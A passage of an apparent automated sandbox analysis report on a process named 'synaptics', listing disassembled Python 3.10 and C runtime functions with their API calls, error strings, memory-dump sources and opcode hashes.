                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String
                                                                                                                                                                                                      • String ID: ZnlU$'%.200s' object is not subscriptable$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1450464846-1597253478
                                                                                                                                                                                                      • Opcode ID: 493ae53d5eca99b1f97719a57c4ee8cc7fe56034c6294624cd081fb6c2a246db
                                                                                                                                                                                                      • Instruction ID: 30e5a3c16a137d97f3325a01230684ebc1adc53e465b930879dfe9ec8480cec3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 493ae53d5eca99b1f97719a57c4ee8cc7fe56034c6294624cd081fb6c2a246db
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A116B33A021009FEB00DE55ED81E9AB3A4DF8022BF258268EC2887F51EB31ED04C7D1
                                                                                                                                                                                                      Function 6C4B0EE0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?,00000000,?,?,6C46C7B6,?,00000000,00000000,?), ref: 6C4B0F01
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?,00000000,?), ref: 6C4B0F13
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\setobject.c,00000922,?,?,00000000,?), ref: 6C4B0F3A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: SubtypeType_$Err_Format
                                                                                                                                                                                                      • String ID: 6tl$%s:%d: bad argument to internal function$D:\a\1\s\Objects\setobject.c$P5tl
                                                                                                                                                                                                      • API String ID: 1453002970-4085398899
                                                                                                                                                                                                      • Opcode ID: 405c4111a21c0029ad9dbad0265178ae501f4a9ac1ac327ec7822a07898d213e
                                                                                                                                                                                                      • Instruction ID: 63f8b15cf04b4ea9108091f8adaaab7ef3715d670179f0191d2f5a7a0d92433d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 405c4111a21c0029ad9dbad0265178ae501f4a9ac1ac327ec7822a07898d213e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 860104B6704105AB8B00DE5DEA80ECEB7A8DB8932AF054165FD1CA7B41E730E905C6F1
                                                                                                                                                                                                      Function 6C5BBCA0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000001,?,00000001), ref: 6C5BBCD8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: List_
                                                                                                                                                                                                      • String ID: PySys_SetArgvEx$can't prepend path0 to sys.path$no mem for sys.argv
                                                                                                                                                                                                      • API String ID: 4215266370-310411965
                                                                                                                                                                                                      • Opcode ID: 793455afa80410f2db7673eb234073df728306c2289f8f6e47eeb8ca63f370cf
                                                                                                                                                                                                      • Instruction ID: 89766f72ba4570c2f5aff56edb8cf14521cd93ecd9f613cd2a01320383c08912
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 793455afa80410f2db7673eb234073df728306c2289f8f6e47eeb8ca63f370cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28F0A471505318ABC701BE349C80D9E3F98AB95264F048924FD1496F52E734AA45CBE6
                                                                                                                                                                                                      Function 6C4B0C50 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0C71
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0C83
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\setobject.c,000008ED), ref: 6C4B0CAA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: SubtypeType_$Err_Format
                                                                                                                                                                                                      • String ID: 6tl$%s:%d: bad argument to internal function$D:\a\1\s\Objects\setobject.c$P5tl
                                                                                                                                                                                                      • API String ID: 1453002970-4085398899
                                                                                                                                                                                                      • Opcode ID: 2b07e8c98c5efad464e8c8a8d2c245a131161ce994d3ecb762037dfe0c90e7cd
                                                                                                                                                                                                      • Instruction ID: c8451d707649a660fef45aea77a54f806b09668a146ad19f3f40a14d87b92a97
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b07e8c98c5efad464e8c8a8d2c245a131161ce994d3ecb762037dfe0c90e7cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10F0B4B7A00218668901A66AAE41D89F378DB4117BB064525FA1CB3F51EB31B51483F2
                                                                                                                                                                                                      Function 6C58FCC0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,6C58768D,?,?,?,?,PyThreadState_Get), ref: 6C58FCD2
                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,6C58768D,?,?,?,?,PyThreadState_Get), ref: 6C58FCDD
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,6C58768D,?,?,?,?,PyThreadState_Get), ref: 6C58FCE6
                                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,6C58768D,?,?,?,?,PyThreadState_Get), ref: 6C58FCF7
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(_PyGILState_NoteThreadState,Couldn't create autoTSSkey mapping,?,?,?,6C58768D,?,?,?,?,PyThreadState_Get), ref: 6C58FD19
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • _PyGILState_NoteThreadState, xrefs: 6C58FD14
                                                                                                                                                                                                      • Couldn't create autoTSSkey mapping, xrefs: 6C58FD0F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Error$LastValue$FatalFunc
                                                                                                                                                                                                      • String ID: Couldn't create autoTSSkey mapping$_PyGILState_NoteThreadState
                                                                                                                                                                                                      • API String ID: 18340086-3655776131
                                                                                                                                                                                                      • Opcode ID: 2aa39bf14269339f00a10843514fffe43adb73f3a380a1e104c3c5e2dc4ba539
                                                                                                                                                                                                      • Instruction ID: 312f75fc0f38739ac5ec394d6db09fa8f4cee66bc885f7ea02e3d917a4e3f481
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2aa39bf14269339f00a10843514fffe43adb73f3a380a1e104c3c5e2dc4ba539
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93F0B432602224ABCF146FA9CC8865ABBBCFF89315B25455DFA08E7900D771A950C6A4
                                                                                                                                                                                                      Function 73A877C3 Relevance: 12.1, APIs: 8, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,73A877B8,73A85988), ref: 73A877D1
                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 73A877DF
                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 73A877F8
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,73A877B8,73A85988), ref: 73A8784C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                      • Opcode ID: 613a4607044591306eca63ee46279c8ab0982c601d43a5a6a59ab97a8c8eaa2e
                                                                                                                                                                                                      • Instruction ID: d16432c37b830dbe80e59585b7a972fdf2731016a9c85edce3377f154690301e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 613a4607044591306eca63ee46279c8ab0982c601d43a5a6a59ab97a8c8eaa2e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC01C03710C3115FE71327769C877E62AA9EB052B4731063FE125B01E8EFA308D29240
                                                                                                                                                                                                      Function 0054102D Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002), ref: 00541030
                                                                                                                                                                                                      • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 0054103B
                                                                                                                                                                                                      • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00541047
                                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 0054105F
                                                                                                                                                                                                      • _configure_wide_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00541940), ref: 00541074
                                                                                                                                                                                                        • Part of subcall function 00541699: InitializeSListHead.KERNEL32(00543358,00541084), ref: 0054169E
                                                                                                                                                                                                      • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(00541683), ref: 00541092
                                                                                                                                                                                                      • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 005410AD
                                                                                                                                                                                                      • _initialize_wide_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 005410BC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2397056113.0000000000541000.00000020.00000001.01000000.00000008.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397019641.0000000000540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397137864.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_540000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_wide_argv_initialize_wide_environment_set_app_type_set_fmode
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1947472503-0
                                                                                                                                                                                                      • Opcode ID: 01f4fdbaa3c44592319a65371339520dc43490fa0be760d1594067244c3b0481
                                                                                                                                                                                                      • Instruction ID: c9460a583a8c2b5dbc7476eb9b869b755f47a7c810bcbc3845f42a1bc80d924a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01f4fdbaa3c44592319a65371339520dc43490fa0be760d1594067244c3b0481
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4011975985F1316DA2037F6590FBEE1E88BFC17DCF1A0844B8089A987EE55C4C145BE
                                                                                                                                                                                                      Function 6C4A8E40 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @xJlr$Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory
                                                                                                                                                                                                      • API String ID: 0-3203586370
                                                                                                                                                                                                      • Opcode ID: c4951779e0a80ca7db5705639f58f0b5994f670c7d129e854095fd7869cbac2d
                                                                                                                                                                                                      • Instruction ID: 9e5c6e205501d9c17a5bb123876eefafb7a6b42bacc565829286a2c11c1c5d82
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4951779e0a80ca7db5705639f58f0b5994f670c7d129e854095fd7869cbac2d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A51E471A042018BCB10DF68EC40E5AB7E5EB99339F204B6AF928D7794D331E856CBD1
                                                                                                                                                                                                      Function 73A894C9 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A89557
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A895AA
                                                                                                                                                                                                        • Part of subcall function 73A881A7: shared_ptr.LIBCMT ref: 73A881C3
                                                                                                                                                                                                        • Part of subcall function 73A880D2: DName::operator+.LIBCMT ref: 73A880F3
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8959B
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A895FB
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A89608
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8964F
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8965C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+$shared_ptr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1037112749-0
                                                                                                                                                                                                      • Opcode ID: d8680213fb8e120c9dbf332c653a3bd5e5f8d4fe22e44c30d5acc49e207129dd
                                                                                                                                                                                                      • Instruction ID: 2d9fc556dbc4583a2dbe70ec83f5b91f46cbe52ccbd6750aabfed138555a6766
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8680213fb8e120c9dbf332c653a3bd5e5f8d4fe22e44c30d5acc49e207129dd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77513171905208AFDB06CF94C982FEEBBBCAB08710F04415EE506A7298DF74A648CB60
                                                                                                                                                                                                      Function 6C4B2C60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Out of memory and PyExc_MemoryError is not initialized yet, xrefs: 6C4B2E12
                                                                                                                                                                                                      • _PyErr_NoMemory, xrefs: 6C4B2E17
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory
                                                                                                                                                                                                      • API String ID: 0-4272006360
                                                                                                                                                                                                      • Opcode ID: f26bec63ed00d05e80c7873c29e37dfb85021362eee79e85409621e3e7bf3f7e
                                                                                                                                                                                                      • Instruction ID: 9baf9741f69c3870326441049854279f582bc123e176ac0ff316a0f1dbc74501
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f26bec63ed00d05e80c7873c29e37dfb85021362eee79e85409621e3e7bf3f7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 993190B06006049FDB20DF25DC45F97B7E9FB40319F208A2CE95A9BB91DB31E905CBA1
                                                                                                                                                                                                      Function 6C4F4B80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromFormatV.PYTHON310(00000000,6C4F519E,00000000,-000000FF,?,?,?,6C4F4CC6,000000FF,000000FF,6C4F519E,?,6C4F519E,00000000,invalid non-printable character U+%s,?), ref: 6C4F4B90
                                                                                                                                                                                                      • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6E7728,?,?,?,invalid non-printable character U+%s,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C4F4BED
                                                                                                                                                                                                      • _Py_BuildValue_SizeT.PYTHON310((O(OiiNii)),00000000,?,?,?,00000000,?,?,?,?,?,?,?,invalid non-printable character U+%s,?), ref: 6C4F4C56
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73E168,00000000), ref: 6C4F4C73
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
